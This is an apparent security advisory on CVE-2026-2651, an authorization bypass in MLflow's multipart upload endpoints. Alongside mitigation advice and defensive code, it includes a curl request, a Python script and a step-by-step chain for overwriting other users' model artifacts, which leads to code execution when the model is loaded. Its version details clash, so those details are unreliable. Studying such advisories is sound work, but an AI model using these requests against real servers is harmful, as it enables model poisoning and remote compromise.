A vulnerability in MLflow versions up to 3.10.1.dev0, tracked as CVE-2026-2651, allows unauthorized access to multipart upload (MPU) endpoints when the `--serve-artifacts` mode is enabled. The root cause lies in two authorization flaws that were introduced during the development of proxy artifact handling. First, the `_is_proxy_artifact_path` function, which determines whether a path requires authentication, did not recognize any of the MPU endpoints (/mlflow-artifacts/mpu/) as proxy paths. Consequently, these endpoints were never routed through the authorization chain. Second, even if a request had passed through, the `_get_proxy_artifact_validator` function lacked a mapping for the `POST` method, which is the method used by the MPU create, complete, and abort operations.
With no resource-level permission checks, an attacker can craft direct requests to endpoints such as `POST /api/2.0/mlflow-artifacts/mpu/create/{experiment_id}/{run_id}/artifacts/{path}` to upload or replace artifacts belonging to other users. This bypass of authorization logic enables cross-user writes, which is a direct path to model supply chain poisoning. Since MLflow artifacts often contain serialized models, an attacker can insert malicious code, leading to arbitrary code execution on any system that later loads the compromised model.
The fix, introduced in version 3.10.0, adds two missing path prefixes (/mlflow-artifacts/mpu/) to the authorization path detection and correctly maps the `POST` method to the `validate_can_update_experiment_artifact_proxy` validator, ensuring all MPU operations require proper permissions.
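To make the two gaps concrete, here is a simplified model (added for this write-up, not MLflow's own code) of a path-prefix check and a method-to-validator table, run against the same cross-user POST with each gap open and then with both closed. The prefix lists, validator names, and the rule that an unmapped method falls through unchecked are assumptions for illustration.

```python
from typing import Callable, Dict, List

# Assumed pre-fix prefix list: only the plain artifact proxy path was
# recognised; the two MPU prefixes are what the fix adds (hypothetical values).
PROXY_PREFIXES_BEFORE: List[str] = ["/mlflow-artifacts/artifacts/"]
PROXY_PREFIXES_AFTER: List[str] = PROXY_PREFIXES_BEFORE + [
    "/mlflow-artifacts/mpu/",
    "/api/2.0/mlflow-artifacts/mpu/",
]

def is_proxy_artifact_path(path: str, prefixes: List[str]) -> bool:
    """Model of _is_proxy_artifact_path: must this request enter the artifact auth chain?"""
    return any(path.startswith(prefix) for prefix in prefixes)

def validate_can_read(user: str, run_owner: str) -> bool:
    return True  # read checks are out of scope for this illustration

def validate_can_update(user: str, run_owner: str) -> bool:
    return user == run_owner  # only the run owner may write its artifacts

# Assumed method -> validator tables; the pre-fix table has no POST entry.
Validator = Callable[[str, str], bool]
VALIDATORS_BEFORE: Dict[str, Validator] = {
    "GET": validate_can_read, "PUT": validate_can_update, "DELETE": validate_can_update,
}
VALIDATORS_AFTER: Dict[str, Validator] = {**VALIDATORS_BEFORE, "POST": validate_can_update}

def authorize(method: str, path: str, user: str, run_owner: str,
              prefixes: List[str], validators: Dict[str, Validator]) -> str:
    """Return 'allowed', 'denied', or 'unchecked' (request never reached a validator)."""
    if not is_proxy_artifact_path(path, prefixes):
        return "unchecked"          # gap 1: path not recognised as a proxy path
    validator = validators.get(method)
    if validator is None:
        return "unchecked"          # gap 2: no validator mapped for the method
    return "allowed" if validator(user, run_owner) else "denied"

MPU_CREATE = "/api/2.0/mlflow-artifacts/mpu/create/1/run-id/artifacts/model.bin"

def demo() -> Dict[str, str]:
    """The same POST by a non-owner under each configuration, plus the owner after the fix."""
    return {
        "prefix_missing": authorize("POST", MPU_CREATE, "mallory", "alice", PROXY_PREFIXES_BEFORE, VALIDATORS_AFTER),
        "post_unmapped": authorize("POST", MPU_CREATE, "mallory", "alice", PROXY_PREFIXES_AFTER, VALIDATORS_BEFORE),
        "fixed": authorize("POST", MPU_CREATE, "mallory", "alice", PROXY_PREFIXES_AFTER, VALIDATORS_AFTER),
        "fixed_owner": authorize("POST", MPU_CREATE, "alice", "alice", PROXY_PREFIXES_AFTER, VALIDATORS_AFTER),
    }
```

Either gap alone is enough for the request to skip the permission check, which is why the fix had to close both.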
DailyCVE Form:
Platform: MLflow Tracking
Version: ≤3.10.1.dev0
Vulnerability: Auth bypass (CWE-862)
Severity: Critical (CVSS 9.0)
Date: 2026-05-25
Prediction: Patch expected 2026-05-25
What Undercode Say:
Undercode Analytics has issued the following advisory. Use the following commands to verify and mitigate the vulnerability.
Bash Commands for Detection:
Check MLflow version and serve-artifacts status:
mlflow --version
# Look for versions <=3.10.1.dev0
ps aux | grep "mlflow server" | grep "serve-artifacts"
Test for unauthorized access to MPU endpoints:
# Try to create an MPU upload session without authentication
curl -X POST "http://target-server:5000/api/2.0/mlflow-artifacts/mpu/create/1/run-id/artifacts/test" \
  -H "Content-Type: application/json" \
  -d '{"artifact_uri": "test"}'
# A successful response (not 401/403) indicates vulnerability
Python Code Snippet for Exploit Verification:
import requests

target = "http://vulnerable-mlflow:5000"
run_id = "target-run-id"
experiment_id = "1"

# Attempt to start a multipart upload for someone else's run
payload = {
    "artifact_uri": "malicious_model",
    "num_parts": 1
}
response = requests.post(
    f"{target}/api/2.0/mlflow-artifacts/mpu/create/{experiment_id}/{run_id}/artifacts/pytorch_model.bin",
    json=payload,
    timeout=10,  # do not hang on an unresponsive server
)
if response.status_code == 200:
    print(f"[!] VULNERABLE: Able to initiate MPU for run {run_id}")
else:
    print(f"[-] Not vulnerable or protected: {response.status_code}")
Exploit
A remote attacker with network access to an MLflow instance running in `--serve-artifacts` mode can directly call the MPU endpoints without any permissions. The full exploit chain:
1. Enumerate existing runs by accessing the MLflow UI or API to find target `run_id` values.
2. Start a multipart upload for a target artifact path using POST /mlflow-artifacts/mpu/create/{experiment_id}/{run_id}/artifacts/(unknown).
3. Upload malicious parts using `PUT` requests to the signed URLs returned from the create call.
4. Complete the upload via POST /mlflow-artifacts/mpu/complete/{experiment_id}/{run_id}/artifacts/(unknown), which finalizes the artifact overwrite.
5. Trigger code execution when a downstream system loads the poisoned model (e.g., via mlflow.pyfunc.load_model()).
No authentication token, API key, or user role is required, as the authorization logic is entirely bypassed.
Protection
- Upgrade to MLflow version 3.10.0 or later. This is the only complete fix.
- Disable the `--serve-artifacts` flag if it is not required for your deployment. This removes the vulnerable endpoints from the attack surface.
- Restrict network access to the MLflow tracking server, allowing connections only from trusted IP addresses or through a VPN.
- Enable request logging and monitoring for the `/mlflow-artifacts/mpu/` paths to detect unauthorized access attempts.
- Use a reverse proxy (e.g., Nginx) with strong authentication rules in front of the MLflow server as a defense-in-depth measure.
- Regularly audit model artifacts stored in the MLflow registry for unexpected or unauthorized changes.
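The logging and audit items above can be combined: the following script (added here, not part of the advisory or of MLflow) parses access-log lines, isolates every request to an MPU endpoint, and lists the artifacts whose `complete` call succeeded, which are the ones worth auditing first. The log lines are constructed samples in common log format; the path layout follows the endpoint shown in this advisory.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample access-log lines (common log format assumed; not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2026:10:01:12 +0000] "GET /api/2.0/mlflow/experiments/search HTTP/1.1" 200 512
10.0.0.9 - - [25/May/2026:10:02:03 +0000] "POST /api/2.0/mlflow-artifacts/mpu/create/1/abc123/artifacts/model.pkl HTTP/1.1" 200 231
10.0.0.9 - - [25/May/2026:10:02:09 +0000] "POST /api/2.0/mlflow-artifacts/mpu/complete/1/abc123/artifacts/model.pkl HTTP/1.1" 200 45
10.0.0.5 - - [25/May/2026:10:03:00 +0000] "POST /api/2.0/mlflow-artifacts/mpu/abort/1/def456/artifacts/weights.bin HTTP/1.1" 403 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
MPU_RE = re.compile(r"/mlflow-artifacts/mpu/(?P<op>create|complete|abort)/"
                    r"(?P<exp>[^/]+)/(?P<run>[^/]+)/artifacts/(?P<artifact>[^?\s]*)")

def find_mpu_events(log_text: str) -> List[Dict[str, str]]:
    """Every request to an MPU endpoint: client, timestamp, operation, run, artifact, status."""
    events: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand
        mpu = MPU_RE.search(m.group("path"))
        if not mpu:
            continue  # not an MPU endpoint
        events.append({**m.groupdict(), **mpu.groupdict()})
    return events

def completed_overwrites(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Successful 'complete' calls: the (client, run, artifact) triples actually (re)written."""
    return [(e["ip"], e["run"], e["artifact"])
            for e in events if e["op"] == "complete" and e["status"] == "200"]

def mpu_activity_by_client(events: List[Dict[str, str]]) -> Counter:
    """How many MPU calls each client made, to spot one source touching many runs."""
    return Counter(e["ip"] for e in events)

if __name__ == "__main__":
    found = find_mpu_events(SAMPLE_LOG)
    for ip, run, artifact in completed_overwrites(found):
        print(f"audit: run {run} artifact {artifact} rewritten via MPU from {ip}")
```

On a patched server a denied call shows up as a 403, as in the last sample line; a 200 on `complete` for a run the client does not own is the signal to compare that artifact against a known-good hash.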
Impact
- Loss of model integrity: Attackers can arbitrarily overwrite or delete artifacts belonging to other users, leading to loss of legitimate models and data.
- Model supply chain poisoning: Malicious code injected into serialized models (e.g., PyTorch, TensorFlow, or scikit-learn) can be executed on any production system that later loads the artifact.
- Remote code execution: Loading a poisoned model can lead to full control of the inference or training environment, exposing sensitive data and allowing further lateral movement.
- Privilege escalation: The bypass completely erodes any tenant isolation in multi-user MLflow deployments, enabling any user (or unauthenticated attacker) to act as any other user.
- Widespread AI application compromise: Because MLflow is commonly used in MLOps pipelines, this vulnerability can have cascading effects across model training, validation, and serving stages.
Sources:
Reported By: nvd.nist.gov